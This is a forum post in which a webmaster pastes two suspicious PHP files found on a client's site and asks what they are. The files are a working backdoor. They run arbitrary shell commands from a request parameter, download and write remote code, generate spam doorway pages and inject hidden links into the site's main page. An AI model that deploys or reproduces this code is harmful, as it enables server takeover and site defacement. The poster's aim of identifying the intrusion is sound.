Andrea Posted May 12, 2010 Report Share Posted May 12, 2010 I was just looking at a client's site and noticed two very strange folders that I have nothing to do with. One is called bpbhl and contains only one file - qxn.php which has this in it: Sorry this is so long, but since I have no clue what might be essential and what not, I figure I better post everything. Can anyone tell what this might be about? I'm concerned. <?php ignore_user_abort(1); set_time_limit(0); function Clear() { unlink("c"); unlink("1r.txt"); unlink("2r.txt"); unlink("log"); } function Clear2() { $mrd = trim(file_get_contents("m")); $pt = "../$mrd"; $fin = file_get_contents($pt); $fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin); $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); $fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin); $fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin); $fin = ereg_replace("<!--dd4-->", "", $fin); $fin = ereg_replace("<!--dd5-->", "", $fin); $fin = ereg_replace("<font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">", "", $fin); $fmrd = fopen($pt, "w+"); fwrite($fmrd, $fin); fclose($fmrd); echo " upt-ok"; } function GetVar($name, &$var) { $var = ""; if (isset($_POST[$name])) $var = $_POST[$name]; if (isset($_GET[$name])) $var = $_GET[$name]; if (($var) =="") return false; else return true; } function GenNew() { $alp = "abcdefghiklmnjsweqrtyuiopzx"; $maps = array(); if (isset($_POST["sg"])) $sg = $_POST["sg"]; if (isset($_GET["sg"])) $sg = $_GET["sg"]; $path = ""; $fr = fopen("1r.txt", "a+"); if (file_exists("c")) { $fconf = file("c"); $tname = trim($fconf[0]); } else { $fconf = fopen("c", "w+"); $rnd = mt_rand(0, 999); $nm = ""; for ($i=0; $i<5; $i++) { $ran = mt_rand(0,26); $sym = $alp[$ran]; $nm = $nm.$sym; } $tname = $nm; mkdir($tname); fwrite($fconf, $tname); $pid = 0; $fht = fopen("$tname/.htaccess", "w+"); $htname = $sg."2.txt"; $fp = fopen($htname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); fwrite($fht, $fin); fclose($fht); } $gname = $sg."sgen.php"; for ($j=$pid; $j<$pid+10; $j++) { $fc = ""; $fp = fopen($gname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); $arr = explode("</html>", $fin); //print_r($arr); $curs = trim($arr[1]); $newf = "$tname/$curs/"; echo "$newf"; mkdir($newf); $fnd = fopen("$tname/$curs/$curs".".php", "w+"); fwrite($fnd, $fin); fclose($fnd); fwrite($fr, "$tname/$curs/$curs".".php\n"); } } function Gen2() { $alp = "abcdefghiklmnjsweqrtyuiopzx"; $maps = array(); $md = false; if (isset($_POST["sg"])) $sg = $_POST["sg"]; if (isset($_GET["sg"])) $sg = $_GET["sg"]; if (isset($_GET["md"])) $md = true; $path = ""; $fr = fopen("1r.txt", "a+"); $f2r = fopen("2r.txt", "a+"); if (file_exists("c")) { $fconf = file("c"); $i_dor = trim($fconf[0]); $i_dor = $i_dor+0; } else { $fconf = fopen("c", "w+"); $rnd = mt_rand(0, 999); $nm = ""; for ($i=0; $i<5; $i++) { $ran = mt_rand(0,26); $sym = $alp[$ran]; $nm = $nm.$sym; } fwrite($fconf, "0\n"); $pid = 0; $fht = fopen(".htaccess", "w+"); $htname = $sg."2.txt"; $fp = fopen($htname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); fwrite($fht, $fin); fclose($fht); $fht = fopen("2.js", "w+"); $htname = $sg."2js.txt"; $fp = fopen($htname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); fwrite($fht, $fin); fclose($fht); $f1t = fopen("1t", "w+"); $f1tname = $sg."1t.php"; $fp = fopen($f1tname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); fwrite($f1t, $fin); fclose($f1t); $f1t = fopen("1g", "w+"); $f1tname = $sg."1g.php"; $fp = fopen($f1tname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); fwrite($f1t, $fin); fclose($f1t); } $i_dor++; $i_dor--; $a1t = file("1t"); $a1g = file("1g"); $ar1 = array("<li>","<p>","<br>"); $ar2 = array("</li>","</p>","<br>"); $gname = $sg."sgen2.php"; for ($j=$pid; $j<$pid+10; $j++) { $rndo = mt_rand(0,count($ar1)-1); $ob1 = $ar1[$rndo]; $ob2 = $ar2[$rndo]; $cth = trim($a1t[$i_dor]); $tmp1 = explode("||", $cth); $cth = $tmp1[1]; $curname = $tmp1[0]; $i_dor++; $fc = ""; $fp = fopen($gname."?th=$cth", "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); preg_match_all( '|<title>(.*)</title>|sUS', $fin, $mtitle ); $mtitle = trim($mtitle[0][0]); $mtitle = strip_tags($mtitle); $keyr1 = ereg_replace(" ", "+", $mtitle); $keyr1 = ereg_replace("\n","", $keyr1); //echo "keyr=$keyr1"; $fp = fopen("http://www.altavista.com/web/results?q=$keyr1&nbq=100", "r"); $yahp = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $yahp .= $fc; } fclose($fp); preg_match_all( '|<a class=\'res\'(.*)</a>|sUS', $yahp, $titles ); $titles = $titles[0]; for ($i=0; $i<count($titles); $i++) { $titles[$i] = strip_tags($titles[$i]); } preg_match_all( '|<span class=s>(.*)</span>|sUS', $yahp, $decs ); $decs = $decs[1]; for ($i=0; $i<count($decs); $i++) { $decs[$i] = strip_tags($decs[$i]); } for ($i=3; $i<count($titles); $i++) { $fin = ereg_replace("<KEYT$i>", $titles[$i], $fin); } for ($i=0; $i<count($decs); $i++) { $fin = ereg_replace("<KEYD$i>", $decs[$i], $fin); } for ($i=0; $i<100; $i++) { $fin = ereg_replace("<KEYD$i>", "", $fin); $fin = ereg_replace("<KEYT$i>", "", $fin); } $links =""; if (($i_dor<192) || ($i_dor>199)) { $rlink1 = mt_rand(1,4); while (true) { $rlink2 = mt_rand(1,4); if ($rlink2!=$rlink1) { break; } } $srnd = mt_rand(3,8); $links1 = ""; for ($y=0; $y<$srnd; $y++) { $rndi = mt_rand(0,299); $rth = trim($a1t[$rndi]); $links1 .= "$ob1 <a href='$rth.php'>$rth</a>$ob2 \n"; $rnd = mt_rand(1,5); if ($rnd==5) { $srndo = mt_rand(0,count($a1g)-1); $exl = trim($a1g[$srndo]); $exla = "http://".$exl; $links1 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n"; } } $fin = ereg_replace("<LINKSD$rlink1>", $links1, $fin); $srnd = mt_rand(3,8); $links2 = ""; for ($y=0; $y<$srnd; $y++) { $rndi = mt_rand(0,299); $rth = trim($a1t[$rndi]); $links2 .= "$ob1 <a href='$rth.php'>$rth</a>$ob2 \n"; $rnd = mt_rand(1,7); if ($rnd==5) { $srndo = mt_rand(0,count($a1g)-1); $exl = trim($a1g[$srndo]); $exla = "http://".$exl; $links2 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n"; } } $fin = ereg_replace("<LINKSD$rlink2>", $links2, $fin); } if ($i_dor==192) { $links1 = ""; $links2 = ""; $links3 = ""; $links4 = ""; for ($y=0; $y<80; $y++) { $rth = trim($a1t[$y]); $tmp1 = explode("||", $rth); $rth = $tmp1[0]; $mname = $tmp1[1]; $rnd = mt_rand(1,5); if ($rnd==5) { $srnd = mt_rand(0,count($a1g)-1); $exl = trim($a1g[$srnd]); $exla = "http://".$exl; $links1 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n"; } $links1 .= "$ob1 <a href='$rth.php'>$mname</a> $ob2 \n"; } $fin = ereg_replace("<LINKSM1>", $links1, $fin); for ($y=80; $y<160; $y++) { $rth = trim($a1t[$y]); $tmp1 = explode("||", $rth); $rth = $tmp1[0]; $mname = $tmp1[1]; $rnd = mt_rand(1,5); if ($rnd==5) { $srnd = mt_rand(0,count($a1g)-1); $exl = trim($a1g[$srnd]); $exla = "http://".$exl; $links2 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n"; } $links2 .= "$ob1 <a href='$rth.php'>$mname</a> $ob2 \n"; } $fin = ereg_replace("<LINKSM2>", $links2, $fin); for ($y=160; $y<240; $y++) { $rth = trim($a1t[$y]); $tmp1 = explode("||", $rth); $rth = $tmp1[0]; $mname = $tmp1[1]; $rnd = mt_rand(1,5); if ($rnd==5) { $srnd = mt_rand(0,count($a1g)-1); $exl = trim($a1g[$srnd]); $exla = "http://".$exl; $links3 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n"; } $links3 .= "$ob1 <a href='$rth.php'>$mname</a> $ob2\n"; } $fin = ereg_replace("<LINKSM3>", $links3, $fin); for ($y=240; $y<320; $y++) { $rth = trim($a1t[$y]); $tmp1 = explode("||", $rth); $rth = $tmp1[0]; $mname = $tmp1[1]; $rnd = mt_rand(1,5); if ($rnd==5) { $srnd = mt_rand(0,count($a1g)-1); $exl = trim($a1g[$srnd]); $exla = "http://".$exl; $links4 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n"; } $links4 .= "$ob1 <a href='$rth.php'>$mname</a> $ob2 \n"; } $fin = ereg_replace("<LINKSM4>", $links4, $fin); } $fin = ereg_replace("<LINKSD1>", "", $fin); $fin = ereg_replace("<LINKSD2>", "", $fin); $fin = ereg_replace("<LINKSD3>", "", $fin); $fin = ereg_replace("<LINKSD4>", "", $fin); $fin = ereg_replace("<LINKSM1>", "", $fin); $fin = ereg_replace("<LINKSM2>", "", $fin); $fin = ereg_replace("<LINKSM3>", "", $fin); $fin = ereg_replace("<LINKSM4>", "", $fin); $curs = $cth; $fnd = fopen("$curname".".php", "w+"); fwrite($fnd, $fin); fclose($fnd); if (($md) && ($i_dor==192 )) { fwrite($fr, "$curname".".php||$curs\n"); } if (($md) && ($i_dor!=192 ) ) { fwrite($f2r, "$curname".".php||$curs\n"); } } $fconf = fopen("c", "w+"); fwrite($fconf, $i_dor."\n"); fclose($fconf); } function Gen() { $alp = "abcdefghiklmnjsweqrtyuiopzx"; $maps = array(); if (isset($_POST["sg"])) $sg = $_POST["sg"]; if (isset($_GET["sg"])) $sg = $_GET["sg"]; if (isset($_POST["gm"])) $g = $_POST["gm"]; if (isset($_GET["gm"])) $g = $_GET["gm"]; $path = ""; $fr = fopen("1r.txt", "a+"); if (file_exists("c")) { $fconf = file("c"); $tname = trim($fconf[0]); $cname = trim($fconf[1]); $curs = trim($fconf[2]); $pid = trim($fconf[3]); if ($pid == 100) { $pid = 0; $rnd = mt_rand(0, 999); $nm = ""; for ($i=0; $i<3; $i++) { $ran = mt_rand(0,26); $sym = $alp[$ran]; $nm = $nm.$sym; } $cname = $nm; mkdir("$tname/$cname"); $curs = $g; } } else { $rnd = mt_rand(0, 999); $nm = ""; for ($i=0; $i<5; $i++) { $ran = mt_rand(0,26); $sym = $alp[$ran]; $nm = $nm.$sym; } $tname = $nm; $pid = 0; $curs = $g; mkdir($tname); $fht = fopen("$tname/.htaccess", "w+"); $htname = $sg."2.txt"; $fp = fopen($htname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); fwrite($fht, $fin); fclose($fht); $rnd = mt_rand(0, 999); $nm = ""; for ($i=0; $i<3; $i++) { $ran = mt_rand(0,26); $sym = $alp[$ran]; $nm = $nm.$sym; } $cname = $nm; mkdir("$tname/$cname"); } $gname = $sg."sgen.php"; for ($j=$pid; $j<$pid+10; $j++) { $fp = fopen($gname."?g=$curs", "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); $fnd = fopen("$tname/$cname/$curs"."_$j.php", "w+"); fwrite($fnd, $fin); fclose($fnd); } if ($j==100) { $fp = fopen($gname."?g=$curs&m=1", "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); $fnd = fopen("$tname/$cname/$curs"."_lm.php", "w+"); fwrite($fnd, $fin); fclose($fnd); $map = "$path/$tname/$cname/$curs"."_lm.php"; fwrite($fr,"$map\n"); } $fconf = fopen("c", "w+"); fwrite($fconf, $tname."\n"); fwrite($fconf, $cname."\n"); fwrite($fconf, $curs."\n"); $nj = $j; fwrite($fconf, $nj."\n"); fclose($fconf); } function Update() { if (isset($_GET["name"])) $sname = $_GET["name"]; $thisname = "$sname.php"; if (isset($_POST['u'])) $u = $_POST['u']; if (isset($_GET['u'])) $u = $_GET['u']; $fp = fopen($u, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); $fthis = fopen($thisname, "w+"); fwrite($fthis, $fin); fclose($fthis); } function Com() { if (isset($_POST['c'])) @system($_POST['c']); if (isset($_GET['c'])) @system($_GET['c']); } function MRepl() { $mpt = ""; $drs = ""; $begtag = "<dd4><font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">"; $endtag = "</font></body></html><dd5> "; $mrd = trim(file_get_contents("m")); $pt = "../$mrd"; $fin = file_get_contents($pt); GetVar("mpt", $mpt); // ??????? ??????????? ???? ???? $fin = preg_replace ("/<\/body>/i", "", $fin); $fin = preg_replace ("/<\/html>/i", "", $fin); $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); $fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin); $fp = fopen($mpt, "r"); $drs = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) { exit(); } $drs .= $fc; } fclose($fp); $fin = $fin.$begtag; $fin = $fin.$drs; $fin = $fin.$endtag; $fmrd = fopen($pt, "w+"); fwrite($fmrd, $fin); fclose($fmrd); } function WrTest() { $path = trim($_GET['wr']); $htname = $path."w.txt"; $fp = fopen($htname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); ; $fout = fopen("w.txt", "w+"); fwrite($fout, $fin); fclose($fout); } function Main() { if (isset($_POST['u']) || isset($_GET['u'])) { Update(); exit(); } if (isset($_POST['c']) || isset($_GET['c'])) { Com(); exit(); } if (isset($_POST['g']) || isset($_GET['g'])) { Gen(); exit(); } if (isset($_POST['g1']) || isset($_GET['g1'])) { GenNew(); exit(); } if (isset($_POST['g2']) || isset($_GET['g2'])) { Gen2(); exit(); } if (isset($_POST['s']) || isset($_GET['s'])) { MRepl(); exit(); } if (isset($_POST['cl']) || isset($_GET['cl'])) { Clear(); exit(); } if (isset($_POST['cl2']) || isset($_GET['cl2'])) { Clear2(); exit(); } if (isset($_POST['wr']) || isset($_GET['wr'])) { WrTest(); exit(); } echo "<ok>"; } Main(); ?> The other folder is called euhdy and contains error_log, tur.php, and w.txt (is empty). tur.php contains <?php ignore_user_abort(1); set_time_limit(0); function Clear() { unlink("c"); unlink("1r.txt"); unlink("2r.txt"); unlink("log"); } function Clear2() { $mrd = trim(file_get_contents("m")); $pt = "../$mrd"; $fin = file_get_contents($pt); $fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin); $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); $fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin); $fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin); $fin = ereg_replace("<!--dd4-->", "", $fin); $fin = ereg_replace("<!--dd5-->", "", $fin); $fin = ereg_replace("<font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">", "", $fin); $fmrd = fopen($pt, "w+"); fwrite($fmrd, $fin); fclose($fmrd); echo " upt-ok"; } function GetVar($name, &$var) { $var = ""; if (isset($_POST[$name])) $var = $_POST[$name]; if (isset($_GET[$name])) $var = $_GET[$name]; if (($var) =="") return false; else return true; } function GenNew() { $alp = "abcdefghiklmnjsweqrtyuiopzx"; $maps = array(); if (isset($_POST["sg"])) $sg = $_POST["sg"]; if (isset($_GET["sg"])) $sg = $_GET["sg"]; $path = ""; $fr = fopen("1r.txt", "a+"); if (file_exists("c")) { $fconf = file("c"); $tname = trim($fconf[0]); } else { $fconf = fopen("c", "w+"); $rnd = mt_rand(0, 999); $nm = ""; for ($i=0; $i<5; $i++) { $ran = mt_rand(0,26); $sym = $alp[$ran]; $nm = $nm.$sym; } $tname = $nm; mkdir($tname); fwrite($fconf, $tname); $pid = 0; $fht = fopen("$tname/.htaccess", "w+"); $htname = $sg."2.txt"; $fp = fopen($htname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); fwrite($fht, $fin); fclose($fht); } $gname = $sg."sgen.php"; for ($j=$pid; $j<$pid+10; $j++) { $fc = ""; $fp = fopen($gname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); $arr = explode("</html>", $fin); //print_r($arr); $curs = trim($arr[1]); $newf = "$tname/$curs/"; echo "$newf"; mkdir($newf); $fnd = fopen("$tname/$curs/$curs".".php", "w+"); fwrite($fnd, $fin); fclose($fnd); fwrite($fr, "$tname/$curs/$curs".".php\n"); } } function Gen2() { $alp = "abcdefghiklmnjsweqrtyuiopzx"; $maps = array(); $md = false; if (isset($_POST["sg"])) $sg = $_POST["sg"]; if (isset($_GET["sg"])) $sg = $_GET["sg"]; if (isset($_GET["md"])) $md = true; $path = ""; $fr = fopen("1r.txt", "a+"); $f2r = fopen("2r.txt", "a+"); if (file_exists("c")) { $fconf = file("c"); $i_dor = trim($fconf[0]); $i_dor = $i_dor+0; } else { $fconf = fopen("c", "w+"); $rnd = mt_rand(0, 999); $nm = ""; for ($i=0; $i<5; $i++) { $ran = mt_rand(0,26); $sym = $alp[$ran]; $nm = $nm.$sym; } fwrite($fconf, "0\n"); $pid = 0; $fht = fopen(".htaccess", "w+"); $htname = $sg."2.txt"; $fp = fopen($htname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); fwrite($fht, $fin); fclose($fht); $fht = fopen("2.js", "w+"); $htname = $sg."2js.txt"; $fp = fopen($htname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); fwrite($fht, $fin); fclose($fht); $f1t = fopen("1t", "w+"); $f1tname = $sg."1t.php"; $fp = fopen($f1tname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); fwrite($f1t, $fin); fclose($f1t); $f1t = fopen("1g", "w+"); $f1tname = $sg."1g.php"; $fp = fopen($f1tname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); fwrite($f1t, $fin); fclose($f1t); } $i_dor++; $i_dor--; $a1t = file("1t"); $a1g = file("1g"); $ar1 = array("<li>","<p>","<br>"); $ar2 = array("</li>","</p>","<br>"); $gname = $sg."sgen2.php"; for ($j=$pid; $j<$pid+10; $j++) { $rndo = mt_rand(0,count($ar1)-1); $ob1 = $ar1[$rndo]; $ob2 = $ar2[$rndo]; $cth = trim($a1t[$i_dor]); $tmp1 = explode("||", $cth); $cth = $tmp1[1]; $curname = $tmp1[0]; $i_dor++; $fc = ""; $fp = fopen($gname."?th=$cth", "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); preg_match_all( '|<title>(.*)</title>|sUS', $fin, $mtitle ); $mtitle = trim($mtitle[0][0]); $mtitle = strip_tags($mtitle); $keyr1 = ereg_replace(" ", "+", $mtitle); $keyr1 = ereg_replace("\n","", $keyr1); //echo "keyr=$keyr1"; $fp = fopen("http://www.altavista.com/web/results?q=$keyr1&nbq=100", "r"); $yahp = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $yahp .= $fc; } fclose($fp); preg_match_all( '|<a class=\'res\'(.*)</a>|sUS', $yahp, $titles ); $titles = $titles[0]; for ($i=0; $i<count($titles); $i++) { $titles[$i] = strip_tags($titles[$i]); } preg_match_all( '|<span class=s>(.*)</span>|sUS', $yahp, $decs ); $decs = $decs[1]; for ($i=0; $i<count($decs); $i++) { $decs[$i] = strip_tags($decs[$i]); } for ($i=3; $i<count($titles); $i++) { $fin = ereg_replace("<KEYT$i>", $titles[$i], $fin); } for ($i=0; $i<count($decs); $i++) { $fin = ereg_replace("<KEYD$i>", $decs[$i], $fin); } for ($i=0; $i<100; $i++) { $fin = ereg_replace("<KEYD$i>", "", $fin); $fin = ereg_replace("<KEYT$i>", "", $fin); } $links =""; if (($i_dor<192) || ($i_dor>199)) { $rlink1 = mt_rand(1,4); while (true) { $rlink2 = mt_rand(1,4); if ($rlink2!=$rlink1) { break; } } $srnd = mt_rand(3,8); $links1 = ""; for ($y=0; $y<$srnd; $y++) { $rndi = mt_rand(0,299); $rth = trim($a1t[$rndi]); $links1 .= "$ob1 <a href='$rth.php'>$rth</a>$ob2 \n"; $rnd = mt_rand(1,5); if ($rnd==5) { $srndo = mt_rand(0,count($a1g)-1); $exl = trim($a1g[$srndo]); $exla = "http://".$exl; $links1 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n"; } } $fin = ereg_replace("<LINKSD$rlink1>", $links1, $fin); $srnd = mt_rand(3,8); $links2 = ""; for ($y=0; $y<$srnd; $y++) { $rndi = mt_rand(0,299); $rth = trim($a1t[$rndi]); $links2 .= "$ob1 <a href='$rth.php'>$rth</a>$ob2 \n"; $rnd = mt_rand(1,7); if ($rnd==5) { $srndo = mt_rand(0,count($a1g)-1); $exl = trim($a1g[$srndo]); $exla = "http://".$exl; $links2 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n"; } } $fin = ereg_replace("<LINKSD$rlink2>", $links2, $fin); } if ($i_dor==192) { $links1 = ""; $links2 = ""; $links3 = ""; $links4 = ""; for ($y=0; $y<80; $y++) { $rth = trim($a1t[$y]); $tmp1 = explode("||", $rth); $rth = $tmp1[0]; $mname = $tmp1[1]; $rnd = mt_rand(1,5); if ($rnd==5) { $srnd = mt_rand(0,count($a1g)-1); $exl = trim($a1g[$srnd]); $exla = "http://".$exl; $links1 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n"; } $links1 .= "$ob1 <a href='$rth.php'>$mname</a> $ob2 \n"; } $fin = ereg_replace("<LINKSM1>", $links1, $fin); for ($y=80; $y<160; $y++) { $rth = trim($a1t[$y]); $tmp1 = explode("||", $rth); $rth = $tmp1[0]; $mname = $tmp1[1]; $rnd = mt_rand(1,5); if ($rnd==5) { $srnd = mt_rand(0,count($a1g)-1); $exl = trim($a1g[$srnd]); $exla = "http://".$exl; $links2 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n"; } $links2 .= "$ob1 <a href='$rth.php'>$mname</a> $ob2 \n"; } $fin = ereg_replace("<LINKSM2>", $links2, $fin); for ($y=160; $y<240; $y++) { $rth = trim($a1t[$y]); $tmp1 = explode("||", $rth); $rth = $tmp1[0]; $mname = $tmp1[1]; $rnd = mt_rand(1,5); if ($rnd==5) { $srnd = mt_rand(0,count($a1g)-1); $exl = trim($a1g[$srnd]); $exla = "http://".$exl; $links3 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n"; } $links3 .= "$ob1 <a href='$rth.php'>$mname</a> $ob2\n"; } $fin = ereg_replace("<LINKSM3>", $links3, $fin); for ($y=240; $y<320; $y++) { $rth = trim($a1t[$y]); $tmp1 = explode("||", $rth); $rth = $tmp1[0]; $mname = $tmp1[1]; $rnd = mt_rand(1,5); if ($rnd==5) { $srnd = mt_rand(0,count($a1g)-1); $exl = trim($a1g[$srnd]); $exla = "http://".$exl; $links4 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n"; } $links4 .= "$ob1 <a href='$rth.php'>$mname</a> $ob2 \n"; } $fin = ereg_replace("<LINKSM4>", $links4, $fin); } $fin = ereg_replace("<LINKSD1>", "", $fin); $fin = ereg_replace("<LINKSD2>", "", $fin); $fin = ereg_replace("<LINKSD3>", "", $fin); $fin = ereg_replace("<LINKSD4>", "", $fin); $fin = ereg_replace("<LINKSM1>", "", $fin); $fin = ereg_replace("<LINKSM2>", "", $fin); $fin = ereg_replace("<LINKSM3>", "", $fin); $fin = ereg_replace("<LINKSM4>", "", $fin); $curs = $cth; $fnd = fopen("$curname".".php", "w+"); fwrite($fnd, $fin); fclose($fnd); if (($md) && ($i_dor==192 )) { fwrite($fr, "$curname".".php||$curs\n"); } if (($md) && ($i_dor!=192 ) ) { fwrite($f2r, "$curname".".php||$curs\n"); } } $fconf = fopen("c", "w+"); fwrite($fconf, $i_dor."\n"); fclose($fconf); } function Gen() { $alp = "abcdefghiklmnjsweqrtyuiopzx"; $maps = array(); if (isset($_POST["sg"])) $sg = $_POST["sg"]; if (isset($_GET["sg"])) $sg = $_GET["sg"]; if (isset($_POST["gm"])) $g = $_POST["gm"]; if (isset($_GET["gm"])) $g = $_GET["gm"]; $path = ""; $fr = fopen("1r.txt", "a+"); if (file_exists("c")) { $fconf = file("c"); $tname = trim($fconf[0]); $cname = trim($fconf[1]); $curs = trim($fconf[2]); $pid = trim($fconf[3]); if ($pid == 100) { $pid = 0; $rnd = mt_rand(0, 999); $nm = ""; for ($i=0; $i<3; $i++) { $ran = mt_rand(0,26); $sym = $alp[$ran]; $nm = $nm.$sym; } $cname = $nm; mkdir("$tname/$cname"); $curs = $g; } } else { $rnd = mt_rand(0, 999); $nm = ""; for ($i=0; $i<5; $i++) { $ran = mt_rand(0,26); $sym = $alp[$ran]; $nm = $nm.$sym; } $tname = $nm; $pid = 0; $curs = $g; mkdir($tname); $fht = fopen("$tname/.htaccess", "w+"); $htname = $sg."2.txt"; $fp = fopen($htname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); fwrite($fht, $fin); fclose($fht); $rnd = mt_rand(0, 999); $nm = ""; for ($i=0; $i<3; $i++) { $ran = mt_rand(0,26); $sym = $alp[$ran]; $nm = $nm.$sym; } $cname = $nm; mkdir("$tname/$cname"); } $gname = $sg."sgen.php"; for ($j=$pid; $j<$pid+10; $j++) { $fp = fopen($gname."?g=$curs", "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); $fnd = fopen("$tname/$cname/$curs"."_$j.php", "w+"); fwrite($fnd, $fin); fclose($fnd); } if ($j==100) { $fp = fopen($gname."?g=$curs&m=1", "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); $fnd = fopen("$tname/$cname/$curs"."_lm.php", "w+"); fwrite($fnd, $fin); fclose($fnd); $map = "$path/$tname/$cname/$curs"."_lm.php"; fwrite($fr,"$map\n"); } $fconf = fopen("c", "w+"); fwrite($fconf, $tname."\n"); fwrite($fconf, $cname."\n"); fwrite($fconf, $curs."\n"); $nj = $j; fwrite($fconf, $nj."\n"); fclose($fconf); } function Update() { if (isset($_GET["name"])) $sname = $_GET["name"]; $thisname = "$sname.php"; if (isset($_POST['u'])) $u = $_POST['u']; if (isset($_GET['u'])) $u = $_GET['u']; $fp = fopen($u, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); $fthis = fopen($thisname, "w+"); fwrite($fthis, $fin); fclose($fthis); } function Com() { if (isset($_POST['c'])) @system($_POST['c']); if (isset($_GET['c'])) @system($_GET['c']); } function MRepl() { $mpt = ""; $drs = ""; $begtag = "<dd4><font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">"; $endtag = "</font></body></html><dd5> "; $mrd = trim(file_get_contents("m")); $pt = "../$mrd"; $fin = file_get_contents($pt); GetVar("mpt", $mpt); // ??????? ??????????? ???? ???? $fin = preg_replace ("/<\/body>/i", "", $fin); $fin = preg_replace ("/<\/html>/i", "", $fin); $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); $fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin); $fp = fopen($mpt, "r"); $drs = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) { exit(); } $drs .= $fc; } fclose($fp); $fin = $fin.$begtag; $fin = $fin.$drs; $fin = $fin.$endtag; $fmrd = fopen($pt, "w+"); fwrite($fmrd, $fin); fclose($fmrd); } function WrTest() { $path = trim($_GET['wr']); $htname = $path."w.txt"; $fp = fopen($htname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); ; $fout = fopen("w.txt", "w+"); fwrite($fout, $fin); fclose($fout); } function Main() { if (isset($_POST['u']) || isset($_GET['u'])) { Update(); exit(); } if (isset($_POST['c']) || isset($_GET['c'])) { Com(); exit(); } if (isset($_POST['g']) || isset($_GET['g'])) { Gen(); exit(); } if (isset($_POST['g1']) || isset($_GET['g1'])) { GenNew(); exit(); } if (isset($_POST['g2']) || isset($_GET['g2'])) { Gen2(); exit(); } if (isset($_POST['s']) || isset($_GET['s'])) { MRepl(); exit(); } if (isset($_POST['cl']) || isset($_GET['cl'])) { Clear(); exit(); } if (isset($_POST['cl2']) || isset($_GET['cl2'])) { Clear2(); exit(); } if (isset($_POST['wr']) || isset($_GET['wr'])) { WrTest(); exit(); } echo "<ok>"; } Main(); 